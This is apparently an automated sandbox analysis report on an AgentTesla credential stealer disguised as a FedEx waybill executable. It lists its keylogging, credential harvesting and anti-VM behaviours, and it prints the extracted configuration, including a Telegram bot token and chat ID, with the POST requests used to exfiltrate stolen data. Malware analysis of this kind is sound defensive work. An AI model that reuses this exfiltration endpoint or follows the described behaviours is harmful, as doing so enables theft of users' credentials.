Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe

Overview

General Information

Sample Name:FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Analysis ID:528766
MD5:994f1f286b24022af59bc5506b1e2871
SHA1:ed961648e2e90a311a9c5e53c15eed3d95853b96
SHA256:edd31cd4c64b1d9f392c6e141a10c028cb11f9640e6eab34960baf6bdd585dc5
Tags:exeFedEx
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Moves itself to temp directory
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Creates processes with suspicious names
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1748127586", "Chat URL": "https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            Click to see the 18 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.2f09098.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                  0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.3fda280.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.3fda280.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                      Click to see the 17 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.12.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1748127586", "Chat URL": "https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument"}
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.5604.1.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendMessage"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeReversingLabs: Detection: 40%
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                      Source: 1.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49812 version: TLS 1.2
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Networking:

                      barindex
                      Uses the Telegram API (likely for C&C communication)Show sources
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: global trafficHTTP traffic detected: POST /bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d9b05ed69793f6Host: api.telegram.orgContent-Length: 1014Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d9b06051514af6Host: api.telegram.orgContent-Length: 1900Expect: 100-continue
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520470982.000000000351D000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520772376.0000000003558000.00000004.00000001.sdmpString found in binary or memory: http://api.telegram.org
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000003.487860465.0000000001630000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.518406294.0000000001633000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: http://yWRCNh.com
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520470982.000000000351D000.00000004.00000001.sdmpString found in binary or memory: https://190L8dvjH7GrrK.net
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: https://190L8dvjH7GrrK.netP
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocumentdocument-----
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org4
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520772376.0000000003558000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgD8
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownHTTP traffic detected: POST /bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d9b05ed69793f6Host: api.telegram.orgContent-Length: 1014Expect: 100-continueConnection: Keep-Alive
                      Source: unknownDNS traffic detected: queries for: api.telegram.org
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49812 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Installs a global keyboard hookShow sources
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeWindow created: window name: CLIPBRDWNDCLASS

                      Spam, unwanted Advertisements and Ransom Demands:

                      barindex
                      Modifies the hosts fileShow sources
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                      System Summary:

                      barindex
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      .NET source code contains very large array initializationsShow sources
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007bC619B418u002d655Au002d43C1u002dBD01u002dC10710B629CFu007d/u003384BCCB0u002d9651u002d44E6u002dA837u002dDA8EAFCCEF4C.csLarge array initialization: .cctor: array initializer size 12200
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 0_2_012E8250
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 0_2_012ED2E8
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_0133E330
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_01337B00
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_01331305
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_0133D760
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_013353B0
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_0133AED0
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_01335B20
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_01335320
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_01334F4F
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_01334FF1
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_01334E08
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_01334EAF
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_0133508D
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_01334EEA
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_013350C5
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_02F949A0
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_02F948B0
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_05BBC070
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeBinary or memory string: OriginalFilename vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.264554627.0000000006300000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.264453189.0000000005F80000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamefnxmUNeuktJYbGJBbHKTVNJNqyVsDYyt.exe4 vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamefnxmUNeuktJYbGJBbHKTVNJNqyVsDYyt.exe4 vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeBinary or memory string: OriginalFilename vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.515825293.0000000000FC8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamefnxmUNeuktJYbGJBbHKTVNJNqyVsDYyt.exe4 vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.517602931.000000000154A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeBinary or memory string: OriginalFilenameDESCKI.exe. vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeReversingLabs: Detection: 40%
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile read: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe:Zone.IdentifierJump to behavior
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe "C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe"
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess created: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess created: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.logJump to behavior
                      Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@3/3@2/1
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeString found in binary or memory: /DESCKI;component/views/addbook.xaml
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeString found in binary or memory: views/addcustomer.baml
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeString found in binary or memory: views/addbook.baml
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeString found in binary or memory: /DESCKI;component/views/addcustomer.xaml
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeString found in binary or memory: /DESCKI;component/views/addbook.xaml
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeString found in binary or memory: views/addbook.baml
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeString found in binary or memory: views/addcustomer.baml
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeString found in binary or memory: /DESCKI;component/views/addcustomer.xaml
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeString found in binary or memory: I/DESCKI;component/views/addbook.xaml_/DESCKI;component/views/borrowfrombookview.xamlU/DESCKI;component/views/borrowingview.xamlO/DESCKI;component/views/changebook.xamlW/DESCKI;component/views/changecustomer.xamlS/DESCKI;component/views/customerview.xamlW/DESCKI;component/views/deletecustomer.xamlM/DESCKI;component/views/errorview.xamlQ/DESCKI;component/views/smallextras.xamlQ/DESCKI;component/views/addcustomer.xaml
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeString found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.b50000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.b50000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.db0000.5.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.db0000.3.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.db0000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.db0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.db0000.7.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.db0000.9.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 0_2_00B592F5 push ds; ret
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 0_2_00B59361 push ds; retf
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 0_2_00B59347 push ds; ret
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_00DB9347 push ds; ret
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_00DB92F5 push ds; ret
